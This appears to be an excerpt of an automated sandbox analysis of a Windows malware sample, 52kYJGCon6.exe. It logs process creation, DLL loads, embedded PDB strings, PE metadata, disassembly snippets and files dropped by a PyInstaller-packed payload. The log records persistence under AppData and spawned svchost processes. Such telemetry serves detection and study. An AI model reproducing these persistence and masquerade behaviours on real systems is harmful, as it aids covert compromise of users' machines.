      Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp1946.exe "C:\Users\user\AppData\Local\Temp\tmp1946.exe"
      Source: C:\Users\user\Desktop\52kYJGCon6.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSMJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe "C:\Users\user\AppData\Local\Temp\tmp8AEF.exe" Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp1946.exe "C:\Users\user\AppData\Local\Temp\tmp1946.exe" Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe "C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe" Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe "C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe" Jump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSMJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe "C:\Users\user\AppData\Local\Temp\tmp8AEF.exe" Jump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSMJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeSection loaded: libffi-7.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
      Source: 52kYJGCon6.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: 52kYJGCon6.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252606142.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252934104.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.6.dr
      Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2d-lb source: tmp1946.exe, 0000000B.00000002.2550280470.000001DEDDCEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: tmp8AEF.exe, 00000006.00000003.2248974675.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ucrtbase.pdb source: tmp8AEF.exe, 00000009.00000002.2286113655.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmp, ucrtbase.dll.6.dr
      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249958467.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2248657749.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2251720235.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252310432.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2253222483.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: tmp8AEF.exe, 00000009.00000002.2286471285.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmp, _ctypes.pyd.6.dr
      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249383761.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2251941372.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2251543551.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252213246.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.6.dr
      Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*e*1bUzbt source: tmp1946.exe, 0000000B.00000002.2550280470.000001DEDDD54000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2248762279.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: vcruntime140.amd64.pdbGCTL source: tmp8AEF.exe, 00000006.00000003.2247224120.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2286668785.00007FF8BFB9E000.00000002.00000001.01000000.0000000B.sdmp, VCRUNTIME140.dll.6.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2250274909.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2248420271.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2248862487.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252122918.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.6.dr
      Source: Binary string: .PdB] source: tmp8AEF.exe.2.dr
      Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, select.pyd.6.dr
      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2250489173.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.6.dr
      Source: Binary string: ucrtbase.pdbUGP source: tmp8AEF.exe, 00000009.00000002.2286113655.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmp, ucrtbase.dll.6.dr
      Source: Binary string: vcruntime140.amd64.pdb source: tmp8AEF.exe, 00000006.00000003.2247224120.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2286668785.00007FF8BFB9E000.00000002.00000001.01000000.0000000B.sdmp, VCRUNTIME140.dll.6.dr
      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2253847052.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249252254.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: tmp8AEF.exe, 00000006.00000003.2251634380.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.6.dr
      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2250150623.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2248544698.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252025674.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: tmp8AEF.exe, 00000009.00000002.2285358677.00007FF8A8DFD000.00000002.00000001.01000000.0000000A.sdmp
      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252744243.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249846119.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.6.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: tmp8AEF.exe, 00000006.00000003.2250404359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.6.dr
      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2250054696.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2255160433.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2250601167.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2251816746.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2250735702.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249118850.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252826757.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249752086.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249568887.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D49000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.6.dr
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252448737.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2253312352.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: 52kYJGCon6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 52kYJGCon6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 52kYJGCon6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 52kYJGCon6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 52kYJGCon6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: ucrtbase.dll.6.drStatic PE information: 0x81CF5D89 [Wed Jan 5 14:32:41 2039 UTC]
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D2DFBC LoadLibraryA,GetProcAddress,0_2_00007FF795D2DFBC
      Source: 52kYJGCon6.exeStatic PE information: section name: .x64
      Source: 8D8EBC2422383023011859.exe.0.drStatic PE information: section name: .x64
      Source: libcrypto-1_1.dll.6.drStatic PE information: section name: .00cfg
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D64812 push rbp; iretd 0_2_00007FF795D64813
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D64A11 push rcx; iretd 0_2_00007FF795D64A12
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D649C0 push 00000041h; ret 0_2_00007FF795D649C4
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D649A9 push rbp; iretd 0_2_00007FF795D649AA
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D62439 push rdx; retf 0_2_00007FF795D6243D
      Source: C:\Windows\explorer.exeCode function: 3_2_08B98524 push ebp; iretd 3_2_08B9852B
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E664812 push rbp; iretd 4_2_00007FF60E664813
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E662439 push rdx; retf 4_2_00007FF60E66243D
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E6649A9 push rbp; iretd 4_2_00007FF60E6649AA
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E664A11 push rcx; iretd 4_2_00007FF60E664A12
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: 4_2_00007FF60E6649C0 push 00000041h; ret 4_2_00007FF60E6649C4
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFD4812 push rbp; iretd 5_2_00007FF60BFD4813
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFD49A9 push rbp; iretd 5_2_00007FF60BFD49AA
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFD49C0 push 00000041h; ret 5_2_00007FF60BFD49C4
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFD4A11 push rcx; iretd 5_2_00007FF60BFD4A12
      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00007FF60BFD2439 push rdx; retf 5_2_00007FF60BFD243D
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B832FAED push rdi; ret 9_2_00007FF8B832FAF4
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B832A096 push rdi; ret 9_2_00007FF8B832A0A2
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B8330200 push rdi; ret 9_2_00007FF8B8330206
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B832A5B5 push rdi; ret 9_2_00007FF8B832A5BB
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8BFB9CB1B push rbp; retf 9_2_00007FF8BFB9CB28
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BF02439 push rdx; retf 10_2_00007FF69BF0243D
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BF04A11 push rcx; iretd 10_2_00007FF69BF04A12
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BF049C0 push 00000041h; ret 10_2_00007FF69BF049C4
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BF049A9 push rbp; iretd 10_2_00007FF69BF049AA
      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00007FF69BF04812 push rbp; iretd 10_2_00007FF69BF04813
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6838DD51C push rsp; ret 11_2_00007FF6838DD525
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_ctypes.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_hashlib.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
